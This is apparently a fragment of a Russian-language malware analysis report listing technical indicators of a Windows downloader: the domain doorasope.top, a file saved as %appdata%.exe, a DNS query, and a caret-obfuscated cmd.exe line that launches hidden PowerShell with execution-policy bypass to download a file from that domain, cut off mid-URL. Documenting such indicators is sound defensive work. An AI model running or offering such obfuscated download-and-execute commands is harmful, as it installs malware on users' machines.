Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oWe^R^ShEll.exe ^-^ExEC^u^T^ioNp^O^Li^CY b^Y^PA^SS -N^OP^ROF^iLe -wIn^dOw^STYL^e hId^DeN^ (^Ne^w^-^Obj^E^CT SYstEm^.NeT^.^wEb^Cl^ieNt).^Dow^nlOaD^f^i^l^e^(^'http://www.doorasope...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "p^oWe^R^ShEll.exe ^-^ExEC^u^T^ioNp^O^Li^CY b^Y^PA^SS -N^OP^ROF^iLe -wIn^dOw^STYL^e hId^DeN^ (^Ne^w^-^Obj^E^CT SYstEm^.NeT^.^wEb^Cl^ieNt).^Dow^nlOaD^f^i^l^e^(^'http://www.doorasope...' (со скрытым окном)